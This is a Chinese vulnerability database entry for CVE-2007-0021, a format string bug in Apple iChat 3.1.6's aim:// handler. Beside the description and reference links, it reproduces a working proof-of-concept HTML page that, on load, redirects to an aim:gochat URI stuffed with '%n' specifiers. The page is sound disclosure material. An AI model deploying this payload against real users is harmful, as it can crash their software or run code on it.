Apple iChat AIM URL Handler 格式化字符串漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112058 漏洞类型 格式化字符串
发布时间 2007-01-21 更新时间 2007-02-20
CVE编号 CVE-2007-0021 CNNVD-ID CNNVD-200701-384
漏洞平台 OSX CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3166
https://www.securityfocus.com/bid/22146
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-384
|漏洞详情
AppleiChat3.1.6中存在格式化字符串漏洞。远程攻击者可以借助aim://URI中的格式化字符串分类符,来引起拒绝服务攻击(空指针引用和应用程序崩溃)以及可能执行任意代码。
|漏洞EXP
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
	"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
	<head>
		<title>MOAB-20-01-2007</title>
		<script>
			function boom() {
				var str = '';
				for (var i = 0; i < 20; i++) {
				    str = str + escape('A%n');
				}
				str = 'aim:gochat?roomname=' + str;
				window.location = str;
			}
		</script>
	</head>
	<body onload="boom()">
	</body>
</html>

# milw0rm.com [2007-01-21]
|受影响的产品
Apple iChat 3.1.6
|参考资料

来源:US-CERT
名称:TA07-047A
链接:http://www.us-cert.gov/cas/techalerts/TA07-047A.html
来源:US-CERT
名称:VU#794752
链接:http://www.kb.cert.org/vuls/id/794752
来源:VUPEN
名称:ADV-2007-0274
链接:http://www.frsirt.com/english/advisories/2007/0274
来源:MISC
链接:http://projects.info-pull.com/moab/MOAB-20-01-2007.html
来源:OSVDB
名称:32715
链接:http://osvdb.org/32715
来源:XF
名称:ichat-aim-format-string(31679)
链接:http://xforce.iss.net/xforce/xfdb/31679
来源:SECTRACK
名称:1017661
链接:http://www.securitytracker.com/id?1017661
来源:BID
名称:22146
链接:http://www.securityfocus.com/bid/22146
来源:SECUNIA
名称:24198
链接:http://secunia.com/advisories/24198
来源:APPLE
名称:APPLE-SA-2007-02-15
链接:http://lists.apple.com/archives/Security-announce/2007/Feb/msg00000.html
来源:docs.info.apple.com
链接:http://docs.info.apple.com/article.html?artnum=305102